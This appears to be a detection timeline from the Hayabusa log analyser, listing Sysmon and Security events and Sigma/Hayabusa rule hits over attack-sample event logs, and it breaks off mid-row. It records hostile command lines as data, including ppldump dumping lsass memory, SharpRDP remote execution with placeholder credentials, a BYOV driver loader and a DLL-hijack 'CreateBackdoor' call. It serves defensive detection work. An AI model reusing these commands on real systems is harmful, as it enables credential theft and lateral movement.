rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 747F3D96-28B3-5E1E-0000-00101DF17B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 747F3D96-2910-5E1E-0000-001053F57C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx 2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx 2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx 2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx 2020-01-24 04:09:34.660 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx 2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:12.876 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:13.098 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 17:28:13.147 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx 2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:25.164 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-10 19:08:27.797 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx 2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx 2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx 2020-03-07 22:17:38.534 +09:00,MSEDGEWIN10,4698,info,,Task Created,"Name: \FullPowersTask | Content: \FullPowersTask S-1-5-19 LeastPrivilege SeAssignPrimaryTokenPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeImpersonatePrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege IgnoreNew true true true false false PT10M PT1H true false true true false false false false false PT72H 7 C:\Users\Public\Tools\TokenManip\FullPowers.exe -t 4932 | User: LOCAL SERVICE | LID: 0x3e5",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx 2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,info,,Task Deleted,Name: \FullPowersTask | User: LOCAL SERVICE | LID: 0x3e5,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx 2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx 2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx 2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx 2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx 2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: usoclient StartInteractiveScan | Process: C:\Windows\System32\UsoClient.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 2276 | PGUID: 747F3D96-9F60-5E75-0000-001081BE1D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:16.507 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 7696 | PGUID: 747F3D96-9F60-5E75-0000-0010E7CC1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Persistence - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 4696 | PGUID: 747F3D96-9F60-5E75-0000-00104ADA1D00 | Hash: SHA1=60FC364639C2264F76A00B153AC153751CC179F8,MD5=33446D4A3C3F2A2CD1051F91649C02C3,SHA256=DEBD522F85D48FD8244F67B478DE85167F0EDE6C341E3F3A0272BEB8D984477E,IMPHASH=8C2ED772723C9E5FAEA539B0F8C1C8E7",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.982 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8116 | PGUID: 747F3D96-9F61-5E75-0000-0010736B1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.996 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6620 | PGUID: 